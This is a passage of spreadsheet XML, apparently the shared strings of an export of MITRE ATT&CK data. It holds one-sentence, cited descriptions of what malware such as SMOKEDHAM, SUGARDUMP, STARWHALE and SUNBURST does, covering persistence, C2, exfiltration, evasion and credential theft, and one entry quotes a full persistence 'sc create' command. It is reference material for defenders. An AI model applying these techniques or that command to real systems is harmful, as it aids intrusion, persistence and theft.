  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use WMI for lateral movement.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can create a WMI Event to execute a payload for persistence.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) tracks `TrustedHosts` and can move laterally to these targets via WinRM.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can establish persistence by creating a new service.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has hashed a string containing system information prior to exfiltration via POST requests.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has uploaded files and information from victim machines.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has sent system information to a C2 server via HTTP and HTTPS POST requests.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has deleted itself and the 'index.dat' file on a compromised machine to remove recent Internet history from the system.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can enumerate files and directories.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has been created with a hidden attribute to insure it's not visible to the victim.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has downloaded files onto a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has a keylogging capability.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has named a service it establishes on victim machines as "TaskFrame" to hide its malicious purpose.(Citation: CISA MAR SLOTHFULMEDIA October 2020) </t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has mimicked the names of known executables, such as mediaplayer.exe.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can add, modify, and/or delete registry keys. It has changed the proxy configuration of a victim system by modifying the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap&lt;/code&gt; registry.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has enumerated processes by ID, name, or privileges.(Citation: CISA MAR SLOTHFULMEDIA October 2020) </t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can inject into running processes on a compromised host.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has taken a screenshot of a victim's desktop, named it "Filter3.jpg", and stored it in the local directory.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has the capability to start services.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has the capability to stop processes and services.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has collected system name, OS version, adapter information, memory usage, and disk information from a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can enumerate open ports on a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has collected the username from a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has the capability to enumerate services.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has used HTTP and HTTPS for C2 communications.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can open a command line to execute commands.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has created a service on victim machines named "TaskFrame" to establish persistence.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOWDRIFT](https://attack.mitre.org/software/S0218) uses cloud based services for C2.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SLOWDRIFT](https://attack.mitre.org/software/S0218) downloads additional payloads.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SLOWDRIFT](https://attack.mitre.org/software/S0218) collects and sends system information to its C2.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has added created user accounts to local Admin groups.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used a fronted domain to obfuscate its hard-coded C2 server domain.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>The [SMOKEDHAM](https://attack.mitre.org/software/S0649) source code is embedded in the dropper as an encrypted string.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has exfiltrated data to its C2 server.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has modified the Registry to hide created user accounts from the Windows logon screen. (Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used Powershell to download UltraVNC and [Ngrok](https://attack.mitre.org/software/S0508) from third-party file sharing sites.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) can continuously capture keystrokes.(Citation: FireEye Shining A Light on DARKSIDE May 2021)(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has created user accounts and added them to local Admin groups.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used &lt;code&gt;net.exe user&lt;/code&gt; and &lt;code&gt;net.exe users&lt;/code&gt; to enumerate local accounts on a compromised host.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has relied upon users clicking on a malicious link delivered through phishing.(Citation: FireEye Shining A Light on DARKSIDE May 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has modified registry keys for persistence, to enable credential caching for credential access, and to facilitate lateral movement via RDP.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) can execute Powershell commands sent from its C2 server.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used &lt;code&gt;reg.exe&lt;/code&gt; to create a Registry Run key.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) can capture screenshots of the victim’s desktop.(Citation: FireEye Shining A Light on DARKSIDE May 2021)(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has been delivered via malicious links in phishing emails.(Citation: FireEye Shining A Light on DARKSIDE May 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has encoded its C2 traffic with Base64.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has encrypted its C2 traffic with RC4.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used the &lt;code&gt;systeminfo&lt;/code&gt; command on a compromised host.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used &lt;code&gt;whoami&lt;/code&gt; commands to identify system owners.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has communicated with its C2 servers via HTTPS and HTTP POST requests.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used Google Drive and Dropbox to host files downloaded by victims via malicious links.(Citation: FireEye Shining A Light on DARKSIDE May 2021)</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) establishes persistence through a Registry Run key.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) encrypts C2 traffic using AES with a static key.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) communicates with its C2 server over HTTP.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) is capable of executing commands and spawning a reverse shell.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of enumerating application windows.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) communicates via DNS for C2.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of enumerating and manipulating files and directories.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of modifying the Registry.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of gathering system information.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>Data [SPACESHIP](https://attack.mitre.org/software/S0035) copies to the staging area is compressed with zlib. Bytes are rotated by four positions and XOR'ed with 0x23.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) copies staged data to removable drives when they are inserted into the system.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) identifies files and directories for collection by searching for specific file extensions or file modification time.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) identifies files with certain extensions and copies them to a directory in the user's profile.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) achieves persistence by creating a shortcut in the current user's Startup folder.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has scripts that are responsible for deobfuscating additional scripts.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[SQLRat](https://attack.mitre.org/software/S0390) has used been observed deleting scripts once used.(Citation: Flashpoint FIN 7 March 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[SQLRat](https://attack.mitre.org/software/S0390) can make a direct SQL connection to a Microsoft database controlled by the attackers, retrieve an item from the bindata table, then write and execute the file on disk.(Citation: Flashpoint FIN 7 March 2019)	</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) relies on users clicking on an embedded image to execute the scripts.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has used a character insertion obfuscation technique, making the script appear to contain Chinese characters.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has used PowerShell to create a Meterpreter session.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has created scheduled tasks in &lt;code&gt;%appdata%\Roaming\Microsoft\Templates\&lt;/code&gt;.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has used SQL to execute JavaScript and VB scripts on the host system.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) can collect data from an infected local host.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) can exfiltrate collected data to its C2 servers.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) has stored collected data in a file called `stari.txt`.(Citation: Mandiant UNC3313 Feb 2022)</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) has relied on victims opening a malicious Excel file for execution.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) has been obfuscated with hex-encoded strings.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) can establish persistence by installing itself in the startup folder, whereas the GO variant has created a `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OutlookM` registry key.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Mandiant UNC3313 Feb 2022)</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) has the ability to hex-encode collected data from an infected host.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) can gather the computer name of an infected host.(Citation: Mandiant UNC3313 Feb 2022)(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) has the ability to collect the IP address of an infected host.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[STARWHALE](https://attack.mitre.org/software/S1037) can gather the username from an infected host.(Citation: Mandiant UNC3313 Feb 2022)(Citation: DHS CISA AA22-055A MuddyWater February 2022) </t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) can use the VBScript function `GetRef` as part of its persistence mechanism.(Citation: Mandiant UNC3313 Feb 2022)</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) has the ability to contact actor-controlled C2 servers via HTTP.(Citation: Mandiant UNC3313 Feb 2022)(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) has the ability to execute commands via `cmd.exe`.(Citation: Mandiant UNC3313 Feb 2022)</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) has the ability to create the following Windows service to establish persistence on an infected host: `sc create Windowscarpstss binpath= "cmd.exe /c cscript.exe c:\\windows\\system32\\w7_1.wsf humpback_whale" start= "auto" obj= "LocalSystem"`.(Citation: Mandiant UNC3313 Feb 2022)</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) has encrypted collected data using AES CBC mode and encoded it using Base64.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) has collected browser bookmark and history information.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) variants have harvested credentials from browsers such as Firefox, Chrome, Opera, and Edge.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) has sent stolen credentials and other data to its C2 server.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) can search for and collect data from specific Chrome, Opera, Microsoft Edge, and Firefox files, including any folders that have the string `Profile` in its name.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) has stored collected data under `%&lt;malware_execution_folder&gt;%\\CrashLog.txt`.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>A [SUGARDUMP](https://attack.mitre.org/software/S1042) variant used SMTP for C2.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>Some [SUGARDUMP](https://attack.mitre.org/software/S1042) variants required a user to enable a macro within a malicious .xls file for execution.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUGARDUMP](https://attack.mitre.org/software/S1042)'s scheduled task has been named `MicrosoftInternetExplorerCrashRepoeterTaskMachineUA` or `MicrosoftEdgeCrashRepoeterTaskMachineUA`, depending on the Windows OS version.(Citation: Mandiant UNC3890 Aug 2022) </t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) has been named `CrashReporter.exe` to appear as a legitimate Mozilla executable.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) has created scheduled tasks called `MicrosoftInternetExplorerCrashRepoeterTaskMachineUA` and `MicrosoftEdgeCrashRepoeterTaskMachineUA`, which were configured to execute `CrashReporter.exe` during user logon.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) can identify Chrome, Opera, Edge Chromium, and Firefox browsers, including version number, on a compromised host.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>A [SUGARDUMP](https://attack.mitre.org/software/S1042) variant has used HTTP for C2.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>[SUGARUSH](https://attack.mitre.org/software/S1049) has checked for internet connectivity from an infected host before attempting to establish a new TCP connection.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>[SUGARUSH](https://attack.mitre.org/software/S1049) has used TCP for C2.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>[SUGARUSH](https://attack.mitre.org/software/S1049) has used port 4585 for a TCP connection to its C2.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>[SUGARUSH](https://attack.mitre.org/software/S1049) has used `cmd` for execution on an infected host.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>[SUGARUSH](https://attack.mitre.org/software/S1049) has created a service named `Service1` for persistence.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) also removed the firewall rules it created during execution.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) removed IFEO registry values to clean up traces of persistence.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) was digitally signed by SolarWinds from March - May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) used DNS for C2 traffic designed to mimic normal SolarWinds API communications.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected information from a compromised host.(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) attempted to disable software security services following checks against a FNV-1a + XOR hashed hardcoded blocklist.(Citation: FireEye SUNBURST Additional Details Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) dynamically resolved C2 infrastructure for randomly-generated subdomains within a parent domain.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) had a command to delete files.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) had commands to enumerate files and directories.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) created an Image File Execution Options (IFEO) Debugger registry value for the process &lt;code&gt;dllhost.exe&lt;/code&gt; to trigger the installation of [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) removed HTTP proxy registry values to clean up traces of execution.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNBURST](https://attack.mitre.org/software/S0559) source code used generic variable names and pre-obfuscated strings, and was likely sanitized of developer comments before being added to [SUNSPOT](https://attack.mitre.org/software/S0562).(Citation: CrowdStrike SUNSPOT Implant January 2021) </t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) delivered different payloads, including [TEARDROP](https://attack.mitre.org/software/S0560) in at least one instance.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) added junk bytes to its C2 over HTTP.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNBURST](https://attack.mitre.org/software/S0559) created VBScripts that were named after existing services or folders to blend into legitimate activities.(Citation: Microsoft Deep Dive Solorigate January 2021) </t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) had commands that allow an attacker to write or delete registry keys, and was observed stopping services by setting their &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\services\\[service_name]\\Start&lt;/code&gt; registry entries to value 4.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020) It also deleted previously-created Image File Execution Options (IFEO) Debugger registry values and registry keys related to HTTP proxy to clean up traces of its activity.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) strings were compressed and encoded in Base64.(Citation: Microsoft Analyzing Solorigate Dec 2020) [SUNBURST](https://attack.mitre.org/software/S0559) also obfuscated collected system information using a FNV-1a + XOR algorithm.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected a list of process names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) masqueraded its network traffic as the Orion Improvement Program (OIP) protocol.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected the registry value &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid&lt;/code&gt; from compromised hosts.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNBURST](https://attack.mitre.org/software/S0559) used Rundll32 to execute payloads.(Citation: Microsoft Deep Dive Solorigate January 2021) </t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) checked for a variety of antivirus/endpoint detection agents prior to execution.(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: FireEye SUNBURST Additional Details Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) used Base64 encoding in its C2 traffic.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) C2 data attempted to appear as benign XML related to .NET assemblies or as a faux JSON blob.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: FireEye SUNBURST Additional Details Dec 2020)(Citation: Symantec Sunburst Sending Data January 2021)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) encrypted C2 traffic using a single-byte-XOR cipher.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) checked the domain name of the compromised host to verify it was running in a real environment.(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected hostname, OS version, and device uptime.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected all network interface MAC addresses that are up and not loopback devices, as well as IP address, DHCP configuration, and domain information.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected the username from a compromised host.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected a list of service names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) remained dormant after initial access for a period of up to two weeks.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) used VBScripts to initiate the execution of payloads.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) communicated via HTTP GET or HTTP POST requests to third party servers for C2.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) used the WMI query &lt;code&gt;Select * From Win32_SystemDriver&lt;/code&gt; to retrieve a driver listing.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) modified its security token to grants itself debugging privileges by adding &lt;code&gt;SeDebugPrivilege&lt;/code&gt;.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) malware was designed and used to insert [SUNBURST](https://attack.mitre.org/software/S0559) into software builds of the SolarWinds Orion IT management product.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNSPOT](https://attack.mitre.org/software/S0562) decrypts [SUNBURST](https://attack.mitre.org/software/S0559), which was stored in AES128-CBC encrypted blobs.(Citation: CrowdStrike SUNSPOT Implant January 2021)  </t>
  </si>
  <si>
    <t xml:space="preserve">[SUNSPOT](https://attack.mitre.org/software/S0562) only replaces SolarWinds Orion source code if the MD5 checksums of both the original source code file and backdoored replacement source code match hardcoded values.(Citation: CrowdStrike SUNSPOT Implant January 2021) </t>
  </si>
  <si>
    <t>Following the successful injection of [SUNBURST](https://attack.mitre.org/software/S0559), [SUNSPOT](https://attack.mitre.org/software/S0562) deleted a temporary file it created named &lt;code&gt;InventoryManager.bk&lt;/code&gt; after restoring the original SolarWinds Orion source code to the software library.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) enumerated the Orion software Visual Studio solution directory path.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNSPOT](https://attack.mitre.org/software/S0562) was identified on disk with a filename of &lt;code&gt;taskhostsvc.exe&lt;/code&gt; and it created an encrypted log file at &lt;code&gt;C:\Windows\Temp\vmware-vmdmp.log&lt;/code&gt;.(Citation: CrowdStrike SUNSPOT Implant January 2021) </t>
  </si>
  <si>
